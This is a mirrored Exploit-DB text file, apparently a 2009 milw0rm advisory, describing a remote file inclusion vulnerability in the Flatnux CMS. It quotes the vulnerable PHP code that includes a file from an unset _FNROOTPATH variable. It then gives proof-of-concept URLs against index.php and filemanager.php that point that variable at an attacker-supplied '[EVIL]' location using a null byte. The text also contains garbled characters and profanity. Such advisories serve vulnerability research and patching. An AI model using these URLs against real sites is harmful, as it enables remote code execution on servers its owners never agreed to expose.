exploit-db-mirror/exploits/php/webapps/7969.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

46 lines
No EOL
1.3 KiB
Text
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

@ flatnux Flatnux-2009-01-27 RFI
zależnoÅci P
+ Alfons Luja
+ 2009
+ grts : All friends
VULN :
+++ include/theme.php
...
<?php
if (eregi("theme.php", $_SERVER['PHP_SELF']))
die(); // 0 <-- I dont give a fuck
global $theme, $_FNROOTPATH,$lang; //<-- 1
global $forumback, $forumborder;
$_FN['table_background']=&$forumback;
$_FN['table_border']=&$forumborder;
if ($forumback=="" && $forumborder==""){
$forumback="ffffff";
$forumborder="000000";
}
require_once ($_FNROOTPATH . "themes/$theme/theme.php");
/*------- Funzioni ridefinibili da theme.php--------------*/
//......
+++ /flatnux.php line 116:
//$_FNROOTPATH Still dont have value
include_once "./include/theme.php"; //-- 2
+++ /filemanager.php
include "./include/flatnux.php"; // -- RFI
p0c:
http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]%00
http://localhost/~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&filemanager_editor=tfuj_stary&_FNROOTPATH=[EVIl]%OO
... itd ...
--http://www.wrzuta.pl/audio/xLyg0zckZS/--
#EŁOF lol
# milw0rm.com [2009-02-03]